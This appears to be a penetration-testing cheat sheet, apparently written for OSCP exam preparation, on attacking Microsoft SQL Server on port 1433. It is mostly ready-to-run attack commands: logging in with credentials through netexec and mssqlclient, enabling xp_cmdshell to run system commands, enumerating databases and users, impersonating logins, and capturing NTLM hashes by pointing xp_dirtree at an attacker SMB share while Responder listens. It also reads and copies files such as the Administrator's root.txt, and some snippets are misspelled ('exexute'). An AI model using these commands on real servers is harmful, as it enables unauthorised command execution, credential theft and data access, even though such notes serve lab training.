> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/services/mssql-less-than-tcp-1433-greater-than.md).

# MSSQL \<tcp 1433>

```
netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"
```

<pre><code><strong>mssqlclient.py -p 1433 domain.local/adot8:password@10.10.10.101 -windows-auth
</strong></code></pre>

Configure xp\_cmdshell

```
sp_configure 'show advanced options', '1';
RECONFIGURE;
sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
xp_cmdshell 'whoami;
```

<pre><code><strong>exexute sp_configure 'show advanced options', '1';
</strong>RECONFIGURE;
exexute sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
exexute xp_cmdshell 'whoami;
</code></pre>

Enumeration

<pre><code>select @@version;
<strong>SELECT name FROM sys.databases;
</strong>SELECT name FROM master..sysdatabases;
USE adot8;
SELECT * FROM &#x3C;databaseName>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM &#x3C;databaseName>..sysobjects WHERE xtype = 'U';    &#x3C;-- find users table
select * from &#x3C;databaseName>.dbo.users;
select * from &#x3C;databaseName>..users;
</code></pre>

Impersonate a user

```
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
```

<pre><code><strong>enum_impersonate
</strong>exec_as_user &#x3C;grantor>
exec_as_login &#x3C;grantor>
</code></pre>

Capture hash

```
sudo responder -I tun0
xp_dirtree \\10.10.14.3\adot8\
```

Read a file

```
select x from OpenRowset(BULK 'C:\Users\Administrator\root.txt',SINGLE_CLOB) R(x)
```

Copy a file

```
create table #errortable (ignore int)
```

```
bulk insert #errortable from '\\localhost\c$\windows\win.ini' with ( fieldterminator=',', rowterminator='\n', errorfile='c:\thatjusthappend.txt' )
```
